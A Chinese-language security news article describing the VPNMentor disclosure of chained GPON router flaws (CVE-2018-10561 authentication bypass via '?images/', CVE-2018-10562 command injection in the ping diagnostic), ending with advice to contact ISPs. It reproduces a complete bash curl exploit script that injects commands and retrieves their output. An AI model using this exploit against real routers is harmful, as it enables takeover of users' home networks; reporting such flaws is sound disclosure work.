导语:VPNMentor的安全研究人员对多个GPON家庭路由器进行了全面评估,发现了一个严重的远程代码漏洞,利用此漏洞可以获得对它们的全面控制。
研究人员发现了一种绕过认证的方式来访问GPON家庭路由器(CVE-2018-10561),也就是绕过了我们俗称的“光猫”。专家们将这种身份验证绕过漏洞与另一个命令注入漏洞(CVE-2018-10562)关联在一起,就能够在设备上执行命令。
利用
专家们分析了GPON家用路由器的固件,发现两个不同的严重漏洞(CVE-2018-10561和CVE-2018-10562)可以关联在一起,以便完全控制易受攻击的设备,从而控制网络。第一个漏洞利用设备的身份验证机制,攻击者可以利用该漏洞绕过所有身份验证。
该漏洞会影响HTTP服务器的构建,HTTP服务器会在进行身份验证时检查特定的路径。这允许攻击者使用简单的技巧绕过任何端点上的身份验证。
通过追加
?images/到URL
攻击者可以绕过端点。
这适用于HTML页面和GponForm/
例如,通过插入
/menu.html?images/或/GponForm/diag_FORM?images/
专家们能够控制GPON 家用路由器。
在查看设备功能时,专家们注意到诊断端点包含ping和traceroute命令。使用主机参数就可以注入命令。
“由于路由器将ping结果保存在/ tmp并在用户重访/diag.html时将其发送给用户,因此执行命令并通过身份验证绕过漏洞获取其输出非常简单。”VPNMentor(analysis)发布的分析结果。
专家发布以下bash版本的漏洞利用代码:
#!/bin/bash echo "[+] Sending the Command... " curl -k -d "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=\`$2\`;$2&ipv=0" $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null echo "[+] Waiting...." sleep 3 echo "[+] Retrieving the ouput...." curl -k $1/diag.html?images/ 2>/dev/null | grep 'diag_result = ' | sed -e 's/\\n/\n/g'
“用两种模式反向(`)和分号(;)发送命令,因为不同的模型在不同的设备上触发”。
GPON是一种非常流行的使用光纤的无源光网络设备,这些设备由ISP(网络运营商)提供。据不完全统计,有超过100万人在使用这种类型的网络路由器。
专家们总结表示,
我们在很多随机的GPON路由器上测试了这个漏洞,并发现在这些设备上均存在此漏洞。因为很多人使用这些类型的路由器,所以这个漏洞很有可能会导致整个网络的沦陷。
建议
1.检查您的路由器是否使用GPON网络。
2.请注意,GPON路由器可能会被黑客利用。
3.与ISP沟通,了解他们可以采取哪些措施来修复该漏洞。